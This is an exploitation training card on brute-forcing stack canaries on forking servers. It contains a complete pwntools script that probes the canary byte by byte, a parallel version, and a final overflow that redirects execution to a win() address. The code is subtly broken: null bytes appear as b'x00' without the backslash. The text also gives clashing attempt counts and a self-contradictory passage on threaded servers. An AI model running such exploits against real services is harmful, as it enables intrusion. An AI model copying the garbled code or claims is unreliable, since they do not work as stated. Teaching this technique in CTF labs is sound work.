Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Forking servers — like Apache pre-fork, xinetd-managed daemons, and many CTF challenge servers — call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the TLS canary at fs:0x28. Because the canary is the same across all forks of the same parent process, it can be brute-forced byte by byte without an explicit information-leak primitive. The attack requires at most 256 × 8 = 2048 connection attempts to recover all 8 bytes. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.

Core Concept

fork() creates a child process with a copy of the parent's address space, including: - Stack contents (and therefore the canary on the stack at the point of fork) - TLS segment at fs:0x28 (the master canary value) - Heap, globals, and all other memory

The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.

Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:

Fix the known prefix (start with x00 for byte 0 — canary always starts with null)
Try all 256 values for byte 1: send overflow with x00 + candidate_byte + x00*6 + garbage_rbp + garbage_rip
If the process does not crash (or responds normally), the candidate byte is correct
Move to byte 2, keep byte 1 fixed, repeat

Total attempts: 1 (byte 0, always x00) + 256×7 = 1793 attempts maximum. Average: 1 + 128×7 = 897 attempts.

Detecting crash vs. success: the oracle response depends on the server's behavior: - Connection closed without response: crash (SIGSEGV or __stack_chk_fail) - Connection sends expected response: success — candidate byte is correct

Technical Deep-Dive

from pwn import *
import sys

HOST = 'localhost'
PORT = 9999

def try_canary(canary_bytes):
    """Send overflow with candidate canary; return True if process survives."""
    try:
        r = remote(HOST, PORT, timeout=2)
        r.recvuntil(b'Input: ', timeout=2)

        # buf_size = 64 bytes to reach canary; adjust for your target
        buf_size = 64
        payload  = b'A' * buf_size          # fill buffer
        payload += canary_bytes              # candidate canary (partial or full)
        payload += b'B' * 8                # saved RBP placeholder
        payload += b'C' * 8                # saved RIP placeholder
        r.sendline(payload)

        # If the server echoes back something / sends a menu again: success
        response = r.recv(timeout=1)
        r.close()
        return len(response) > 0
    except Exception:
        return False

def brute_canary():
    canary = b'x00'    # low byte always 0x00

    for byte_idx in range(1, 8):
        found = False
        for candidate in range(0x00, 0x100):
            probe = canary + bytes([candidate]) + b'x00' * (7 - byte_idx)
            if try_canary(probe):
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}  canary so far: {canary.hex()}')
                found = True
                break
        if not found:
            log.error(f'Failed at byte {byte_idx}')
            sys.exit(1)

    return canary

canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')

# Now use the leaked canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload  = b'A' * 64
payload += canary
payload += p64(0xdeadbeef)    # saved RBP
payload += p64(0x401234)      # win() address
r.sendline(payload)
r.interactive()

Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:

from concurrent.futures import ThreadPoolExecutor, as_completed

def check_byte(byte_idx, candidate, known_prefix):
    probe = known_prefix + bytes([candidate]) + b'x00' * (7 - byte_idx)
    return candidate, try_canary(probe)

canary = b'x00'
for byte_idx in range(1, 8):
    with ThreadPoolExecutor(max_workers=32) as executor:
        futures = {
            executor.submit(check_byte, byte_idx, c, canary): c
            for c in range(0x100)
        }
        for future in as_completed(futures):
            candidate, success = future.result()
            if success:
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}')
                break

Reverse Engineering Methodology

Confirm the server forks: strace -e trace=clone,fork ./server or pstree during connection to see if child processes spawn. A new PID per connection confirms forking.
Confirm the canary is consistent: connect twice, trigger a crash on both, observe that the crash report (core dump, dmesg) shows the same corrupted canary value. If values differ, the server does not fork (or re-randomises).
Find the buffer-to-canary offset: connect once, send cyclic(200), observe the crash offset. Subtract to find exactly how many bytes fill the buffer before the canary position.
Automate with pwntools: use remote() in a loop with appropriate timeout settings. The crash causes an RST packet (connection reset), which pwntools registers as an exception — catch it to detect the "wrong candidate" case.

Common Reversing Errors

Assuming all servers are forking: thread-based servers do not fork; they share the same canary trivially (it is process-wide), but crashing one thread crashes all threads — the oracle breaks. Connection-reset detection still works but the canary is the same for all connections, so only one successful attempt is needed per byte if you can recover.
Including wrong null byte in byte 0: the canary's first byte is always x00. If you start the probe with a non-null byte 0, every attempt at byte 1 will fail because the canary comparison fails at byte 0. Always fix byte 0 as x00.
Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
Mistaking a canary check failure for the overflow itself: __stack_chk_fail calls abort(), which sends SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking $? or dmesg distinguishes them.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.